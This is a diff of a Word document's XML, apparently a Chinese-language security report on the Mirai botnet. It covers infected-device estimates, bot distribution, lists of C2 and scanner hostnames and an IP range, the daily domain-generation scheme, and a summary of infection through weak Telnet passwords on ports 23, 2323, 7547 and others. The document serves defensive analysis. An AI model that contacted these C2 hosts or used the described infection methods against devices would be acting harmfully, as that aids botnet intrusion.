-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>之间</w:t>
+        <w:t>全网潜在的可感染设备总数量在3～5百万之间</w:t>
       </w:r>
       <w:sdt>
         <w:sdtPr>
@@ -2839,7 +3162,6 @@
           <w:id w:val="-1636557105"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -2978,11 +3300,11 @@
       <w:pPr>
         <w:pStyle w:val="2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc469905247"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc472191669"/>
       <w:r>
         <w:t>僵尸主机分布</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3016,7 +3338,6 @@
           <w:id w:val="-194389873"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:fldChar w:fldCharType="begin"/>
@@ -3093,7 +3414,6 @@
           <w:id w:val="1552263492"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:fldChar w:fldCharType="begin"/>
@@ -3148,39 +3468,23 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>我们根据宁夏</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>我们根据宁夏派网数据统计了11月27日19时</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>派网数据</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>20时</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>统计了11月27日19时</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>20时</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
         <w:t>流入省口的</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>7547</w:t>
       </w:r>
@@ -3507,6 +3811,7 @@
         <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>印度</w:t>
       </w:r>
       <w:r>
@@ -3539,7 +3844,6 @@
           <w:id w:val="-777330451"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:fldChar w:fldCharType="begin"/>
@@ -3588,17 +3892,17 @@
       <w:pPr>
         <w:pStyle w:val="2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc469905248"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc472191670"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>C&amp;</w:t>
-      </w:r>
-      <w:r>
         <w:t>C</w:t>
       </w:r>
       <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
         <w:t>主机</w:t>
       </w:r>
       <w:r>
@@ -3619,7 +3923,7 @@
         </w:rPr>
         <w:t>特征</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3647,17 +3951,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>主控的域名注册非常谨慎，IP地址频繁变换，绝大多数主控在域名注</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>册时在TLD、注册局、注册邮箱方面设置了多重障碍阻滞安全社区的进一步分析</w:t>
+        <w:t>主控的域名注册非常谨慎，IP地址频繁变换，绝大多数主控在域名注册时在TLD、注册局、注册邮箱方面设置了多重障碍阻滞安全社区的进一步分析</w:t>
       </w:r>
       <w:sdt>
         <w:sdtPr>
@@ -3670,7 +3964,6 @@
           <w:id w:val="-639340145"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -3735,7 +4028,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>[8]</w:t>
+            <w:t>[10]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -3775,7 +4068,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>目前我们搜集到的主控主机名包括</w:t>
+        <w:t>目前我们搜集到的C2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>主机名包括</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3803,7 +4105,7 @@
         <w:rPr>
           <w:rStyle w:val="ab"/>
         </w:rPr>
-        <w:t>report.santasbigcandycane.cx</w:t>
+        <w:t>check.securityupdates.us</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3822,7 +4124,7 @@
         <w:rPr>
           <w:rStyle w:val="ab"/>
         </w:rPr>
-        <w:t>check.securityupdates.us</w:t>
+        <w:t>linux.securityupdates.us</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3841,7 +4143,7 @@
         <w:rPr>
           <w:rStyle w:val="ab"/>
         </w:rPr>
-        <w:t>linux.securityupdates.us</w:t>
+        <w:t>xxx.securityupdates.us</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3860,7 +4162,7 @@
         <w:rPr>
           <w:rStyle w:val="ab"/>
         </w:rPr>
-        <w:t>rep.securityupdates.us</w:t>
+        <w:t>timeserver.host</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3879,7 +4181,7 @@
         <w:rPr>
           <w:rStyle w:val="ab"/>
         </w:rPr>
-        <w:t>xxx.securityupdates.us</w:t>
+        <w:t>zugzwang.me</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3898,7 +4200,7 @@
         <w:rPr>
           <w:rStyle w:val="ab"/>
         </w:rPr>
-        <w:t>ntp.timeserver.host</w:t>
+        <w:t>tr069.online</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3917,7 +4219,7 @@
         <w:rPr>
           <w:rStyle w:val="ab"/>
         </w:rPr>
-        <w:t>zugzwang.me</w:t>
+        <w:t>tr069.tech</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3936,7 +4238,7 @@
         <w:rPr>
           <w:rStyle w:val="ab"/>
         </w:rPr>
-        <w:t>tr069.online</w:t>
+        <w:t>tr069.support</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3954,8 +4256,9 @@
       <w:r>
         <w:rPr>
           <w:rStyle w:val="ab"/>
-        </w:rPr>
-        <w:t>tr069.tech</w:t>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>cnc.changeme.com:23</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3973,15 +4276,179 @@
       <w:r>
         <w:rPr>
           <w:rStyle w:val="ab"/>
-        </w:rPr>
-        <w:t>tr069.support</w:t>
-      </w:r>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>5.188.232.1/24</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="6" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:firstLineChars="200" w:firstLine="422"/>
         <w:rPr>
           <w:rStyle w:val="ab"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLineChars="200" w:firstLine="480"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>扫描报告</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ScanListen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>主机</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="aa"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+        </w:rPr>
+        <w:t>report.santasbigcandycane.cx</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="aa"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+        </w:rPr>
+        <w:t>rep.securityupdates.us</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="aa"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+        </w:rPr>
+        <w:t>report.changeme.com:48101</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="aa"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+        </w:rPr>
+        <w:t>ntp.timeserver.host</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLineChars="200" w:firstLine="480"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLineChars="200" w:firstLine="422"/>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -4025,6 +4492,12 @@
         </w:rPr>
         <w:t>p.ocalhost.host</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+        </w:rPr>
+        <w:t>:80</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4044,6 +4517,12 @@
         </w:rPr>
         <w:t>l.ocalhost.host</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+        </w:rPr>
+        <w:t>:80</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4076,6 +4555,12 @@
         </w:rPr>
         <w:t>pw</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+        </w:rPr>
+        <w:t>:80</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4101,6 +4586,12 @@
         </w:rPr>
         <w:t>5</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+        </w:rPr>
+        <w:t>:80</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4120,6 +4611,12 @@
         </w:rPr>
         <w:t>check.kernelorg.download</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+        </w:rPr>
+        <w:t>:80</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4139,6 +4636,12 @@
         </w:rPr>
         <w:t>update.kernelorg.download</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="ab"/>
+        </w:rPr>
+        <w:t>:80</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4165,27 +4668,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>360分析了一天内各个时段控制指令数量分布，认为控制者位于欧洲和美洲，以欧洲为甚，应</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>不</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>位于北京时区</w:t>
+        <w:t>360分析了一天内各个时段控制指令数量分布，认为控制者位于欧洲和美洲，以欧洲为甚，应不位于北京时区</w:t>
       </w:r>
       <w:sdt>
         <w:sdtPr>
@@ -4198,7 +4681,6 @@
           <w:id w:val="-1935579255"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -4263,7 +4745,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>[8]</w:t>
+            <w:t>[10]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -4283,27 +4765,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>。</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>绿盟给出</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>了一个位于俄罗斯的IP地址</w:t>
+        <w:t>。绿盟给出了一个位于俄罗斯的IP地址</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4325,7 +4787,6 @@
           <w:id w:val="-101658106"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -4390,7 +4851,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>[9]</w:t>
+            <w:t>[11]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -4452,7 +4913,6 @@
           <w:id w:val="-1092553071"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -4502,6 +4962,7 @@
           <w:r>
             <w:rPr>
               <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+              <w:noProof/>
               <w:kern w:val="0"/>
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
@@ -4511,11 +4972,12 @@
           <w:r>
             <w:rPr>
               <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
-              <w:kern w:val="0"/>
-              <w:sz w:val="24"/>
-              <w:szCs w:val="24"/>
-            </w:rPr>
-            <w:t>[10]</w:t>
+              <w:noProof/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:t>[6]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -4621,25 +5083,14 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>域名仅</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>由月、日和硬编码的种子字符串确定</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>域名仅由月、日和硬编码的种子字符串确定</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4664,6 +5115,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>每天只生成一个域名，因此最多存在365个 DGA</w:t>
       </w:r>
       <w:r>
@@ -4698,27 +5150,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>DGA</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>域名仅</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>在硬编码的C2</w:t>
+        <w:t>DGA域名仅在硬编码的C2</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4819,7 +5251,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="1988592"/>
@@ -5324,6 +5755,7 @@
         <w:rPr>
           <w:rStyle w:val="ab"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>2016/12/28 cmhewcvopvno.online</w:t>
       </w:r>
     </w:p>
@@ -5412,7 +5844,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>其中12月</w:t>
       </w:r>
       <w:r>
@@ -5440,27 +5871,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>，其余</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>域名均</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>已被Mirai作者注册。</w:t>
+        <w:t>，其余域名均已被Mirai作者注册。</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -5468,7 +5879,7 @@
       <w:pPr>
         <w:pStyle w:val="1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc469905249"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc472191671"/>
       <w:r>
         <w:t>感染原理</w:t>
       </w:r>
@@ -5476,140 +5887,1281 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
-        <w:ind w:firstLine="480"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>Mirai恶意程序按照其入侵方式可分为两种。早期Mirai扫描23/2323端口，利用</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Mirai通过扫描23,2323,5555,6789,7547,23231,37777等端口上的漏洞进行恶意程序植入</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc472191672"/>
+      <w:r>
+        <w:t>Mirai</w:t>
+      </w:r>
+      <w:r>
+        <w:t>(23)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>感染原理</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>早期Mirai扫描</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>DVR、网络</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>摄像头等设备的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>23/2323端口，利用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Telnet弱口令种植木马</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>。 2016年11月出现的变种</w:t>
-      </w:r>
-      <w:r>
-        <w:t>针对</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>7547</w:t>
-      </w:r>
-      <w:r>
-        <w:t>/5555</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>端口扫描，</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>利用远程命令执行漏洞</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>。</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>绿盟分别</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>对这两种恶意程序的源码进行了分析</w:t>
       </w:r>
       <w:sdt>
         <w:sdtPr>
           <w:rPr>
-            <w:rFonts w:hint="eastAsia"/>
-            <w:bCs/>
+            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
           </w:rPr>
           <w:id w:val="1092735990"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
